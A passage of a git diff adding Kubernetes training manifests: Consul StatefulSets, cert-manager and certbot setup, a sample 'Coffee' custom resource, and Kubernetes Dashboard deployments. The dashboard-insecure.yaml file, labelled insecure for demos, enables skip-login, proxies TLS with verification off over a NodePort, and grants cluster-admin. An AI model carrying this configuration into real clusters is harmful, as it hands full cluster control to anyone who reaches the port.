|
||||
metadata:
|
||||
name: certbot
|
||||
spec:
|
||||
rules:
|
||||
- http:
|
||||
paths:
|
||||
- path: /.well-known/acme-challenge/
|
||||
backend:
|
||||
serviceName: certbot
|
||||
servicePort: 80
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Endpoints
|
||||
metadata:
|
||||
name: certbot
|
||||
subsets:
|
||||
- addresses:
|
||||
- ip: A.B.C.D
|
||||
ports:
|
||||
- port: 8000
|
||||
protocol: TCP
|
||||
|
||||
11
k8s/cm-certificate.yaml
Normal file
11
k8s/cm-certificate.yaml
Normal file
@@ -0,0 +1,11 @@
|
||||
apiVersion: cert-manager.io/v1
|
||||
kind: Certificate
|
||||
metadata:
|
||||
name: xyz.A.B.C.D.nip.io
|
||||
spec:
|
||||
secretName: xyz.A.B.C.D.nip.io
|
||||
dnsNames:
|
||||
- xyz.A.B.C.D.nip.io
|
||||
issuerRef:
|
||||
name: letsencrypt-staging
|
||||
kind: ClusterIssuer
|
||||
18
k8s/cm-clusterissuer.yaml
Normal file
18
k8s/cm-clusterissuer.yaml
Normal file
@@ -0,0 +1,18 @@
|
||||
apiVersion: cert-manager.io/v1
|
||||
kind: ClusterIssuer
|
||||
metadata:
|
||||
name: letsencrypt-staging
|
||||
spec:
|
||||
acme:
|
||||
# Remember to update this if you use this manifest to obtain real certificates :)
|
||||
email: hello@example.com
|
||||
server: https://acme-staging-v02.api.letsencrypt.org/directory
|
||||
# To use the production environment, use the following line instead:
|
||||
#server: https://acme-v02.api.letsencrypt.org/directory
|
||||
privateKeySecretRef:
|
||||
name: issuer-letsencrypt-staging
|
||||
solvers:
|
||||
- http01:
|
||||
ingress:
|
||||
class: traefik
|
||||
|
||||
18
k8s/coffee-1.yaml
Normal file
18
k8s/coffee-1.yaml
Normal file
@@ -0,0 +1,18 @@
|
||||
# Note: apiextensions.k8s.io/v1beta1 is deprecated, and won't be served
|
||||
# in Kubernetes 1.22 and later versions. This YAML manifest is here just
|
||||
# for reference, but it's not intended to be used in modern trainings.
|
||||
apiVersion: apiextensions.k8s.io/v1beta1
|
||||
kind: CustomResourceDefinition
|
||||
metadata:
|
||||
name: coffees.container.training
|
||||
spec:
|
||||
group: container.training
|
||||
version: v1alpha1
|
||||
scope: Namespaced
|
||||
names:
|
||||
plural: coffees
|
||||
singular: coffee
|
||||
kind: Coffee
|
||||
shortNames:
|
||||
- cof
|
||||
|
||||
21
k8s/coffee-2.yaml
Normal file
21
k8s/coffee-2.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: apiextensions.k8s.io/v1
|
||||
kind: CustomResourceDefinition
|
||||
metadata:
|
||||
name: coffees.container.training
|
||||
spec:
|
||||
group: container.training
|
||||
versions:
|
||||
- name: v1alpha1
|
||||
served: true
|
||||
storage: true
|
||||
schema:
|
||||
openAPIV3Schema:
|
||||
type: object
|
||||
scope: Namespaced
|
||||
names:
|
||||
plural: coffees
|
||||
singular: coffee
|
||||
kind: Coffee
|
||||
shortNames:
|
||||
- cof
|
||||
|
||||
37
k8s/coffee-3.yaml
Normal file
37
k8s/coffee-3.yaml
Normal file
@@ -0,0 +1,37 @@
|
||||
apiVersion: apiextensions.k8s.io/v1
|
||||
kind: CustomResourceDefinition
|
||||
metadata:
|
||||
name: coffees.container.training
|
||||
spec:
|
||||
group: container.training
|
||||
scope: Namespaced
|
||||
names:
|
||||
plural: coffees
|
||||
singular: coffee
|
||||
kind: Coffee
|
||||
shortNames:
|
||||
- cof
|
||||
versions:
|
||||
- name: v1alpha1
|
||||
served: true
|
||||
storage: true
|
||||
schema:
|
||||
openAPIV3Schema:
|
||||
type: object
|
||||
required: [ spec ]
|
||||
properties:
|
||||
spec:
|
||||
type: object
|
||||
properties:
|
||||
taste:
|
||||
description: Subjective taste of that kind of coffee bean
|
||||
type: string
|
||||
required: [ taste ]
|
||||
additionalPrinterColumns:
|
||||
- jsonPath: .spec.taste
|
||||
description: Subjective taste of that kind of coffee bean
|
||||
name: Taste
|
||||
type: string
|
||||
- jsonPath: .metadata.creationTimestamp
|
||||
name: Age
|
||||
type: date
|
||||
34
k8s/coffees.yaml
Normal file
34
k8s/coffees.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: arabica
|
||||
spec:
|
||||
taste: strong
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: excelsa
|
||||
spec:
|
||||
taste: fruity
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: liberica
|
||||
spec:
|
||||
taste: smoky
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: robusta
|
||||
spec:
|
||||
taste: stronger
|
||||
bitterness: high
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: java
|
||||
77
k8s/consul-1.yaml
Normal file
77
k8s/consul-1.yaml
Normal file
@@ -0,0 +1,77 @@
|
||||
# Basic Consul cluster using Cloud Auto-Join.
|
||||
# Caveats:
|
||||
# - no actual persistence
|
||||
# - scaling down to 1 will break the cluster
|
||||
# - pods may be colocated
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: Role
|
||||
metadata:
|
||||
name: consul
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources:
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: consul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: consul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: consul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
serviceName: consul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: consul
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: consul
|
||||
spec:
|
||||
serviceAccountName: consul
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.8"
|
||||
env:
|
||||
- name: NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
@@ -1,9 +1,11 @@
|
||||
# Better Consul cluster.
|
||||
# There is still no actual persistence, but:
|
||||
# - podAntiaffinity prevents pod colocation
|
||||
# - clusters works when scaling down to 1 (thanks to lifecycle hook)
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
kind: Role
|
||||
metadata:
|
||||
name: consul
|
||||
labels:
|
||||
app: consul
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources:
|
||||
@@ -13,24 +15,21 @@ rules:
|
||||
- list
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: consul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
kind: Role
|
||||
name: consul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: consul
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: consul
|
||||
labels:
|
||||
app: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
@@ -63,20 +62,22 @@ spec:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- consul
|
||||
matchLabels:
|
||||
app: consul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.4.4"
|
||||
image: "consul:1.8"
|
||||
env:
|
||||
- name: NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s label_selector=\"app=consul\""
|
||||
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
@@ -84,7 +85,4 @@ spec:
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
command: [ "sh", "-c", "consul leave" ]
|
||||
98
k8s/consul-3.yaml
Normal file
98
k8s/consul-3.yaml
Normal file
@@ -0,0 +1,98 @@
|
||||
# Even better Consul cluster.
|
||||
# That one uses a volumeClaimTemplate to achieve true persistence.
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: Role
|
||||
metadata:
|
||||
name: consul
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources:
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: consul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: consul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: consul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
serviceName: consul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: consul
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
name: data
|
||||
spec:
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: consul
|
||||
spec:
|
||||
serviceAccountName: consul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchLabels:
|
||||
app: consul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.8"
|
||||
volumeMounts:
|
||||
- name: data
|
||||
mountPath: /consul/data
|
||||
env:
|
||||
- name: NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command: [ "sh", "-c", "consul leave" ]
|
||||
367
k8s/dashboard-insecure.yaml
Normal file
367
k8s/dashboard-insecure.yaml
Normal file
@@ -0,0 +1,367 @@
|
||||
# This file is based on the following manifest:
|
||||
# https://github.com/kubernetes/dashboard/blob/master/aio/deploy/recommended.yaml
|
||||
# It adds the "skip login" flag, as well as an insecure hack to defeat SSL.
|
||||
# As its name implies, it is INSECURE and you should not use it in production,
|
||||
# or on clusters that contain any kind of important or sensitive data, or on
|
||||
# clusters that have a life span of more than a few hours.
|
||||
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
k8s-app: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-csrf
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
data:
|
||||
csrf: ""
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-key-holder
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
|
||||
kind: ConfigMap
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-settings
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
rules:
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster", "dashboard-metrics-scraper"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
rules:
|
||||
# Allow Metrics Scraper to get metrics from the Metrics server
|
||||
- apiGroups: ["metrics.k8s.io"]
|
||||
resources: ["pods", "nodes"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: kubernetes-dashboard
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: kubernetesui/dashboard:v2.0.0
|
||||
imagePullPolicy: Always
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
- --namespace=kubernetes-dashboard
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
- --enable-skip-login
|
||||
volumeMounts:
|
||||
- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
runAsUser: 1001
|
||||
runAsGroup: 2001
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
nodeSelector:
|
||||
"kubernetes.io/os": linux
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
name: dashboard-metrics-scraper
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 8000
|
||||
targetPort: 8000
|
||||
selector:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
|
||||
---
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
name: dashboard-metrics-scraper
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
|
||||
spec:
|
||||
containers:
|
||||
- name: dashboard-metrics-scraper
|
||||
image: kubernetesui/metrics-scraper:v1.0.4
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
protocol: TCP
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTP
|
||||
path: /
|
||||
port: 8000
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumeMounts:
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
runAsUser: 1001
|
||||
runAsGroup: 2001
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
nodeSelector:
|
||||
"kubernetes.io/os": linux
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
volumes:
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
|
||||
---
|
||||
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
- sh
|
||||
- -c
|
||||
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kubernetes-dashboard:443,verify=0
|
||||
image: alpine
|
||||
name: dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: dashboard
|
||||
type: NodePort
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: insecure-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: cluster-admin
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
305
k8s/dashboard-recommended.yaml
Normal file
305
k8s/dashboard-recommended.yaml
Normal file
@@ -0,0 +1,305 @@
|
||||
# This is a copy of the following file:
|
||||
# https://github.com/kubernetes/dashboard/blob/master/aio/deploy/recommended.yaml
|
||||
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
k8s-app: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-csrf
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
data:
|
||||
csrf: ""
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-key-holder
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
|
||||
kind: ConfigMap
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-settings
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
rules:
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster", "dashboard-metrics-scraper"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
rules:
|
||||
# Allow Metrics Scraper to get metrics from the Metrics server
|
||||
- apiGroups: ["metrics.k8s.io"]
|
||||
resources: ["pods", "nodes"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: kubernetes-dashboard
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: kubernetesui/dashboard:v2.0.0
|
||||
imagePullPolicy: Always
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
- --namespace=kubernetes-dashboard
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
volumeMounts:
|
||||
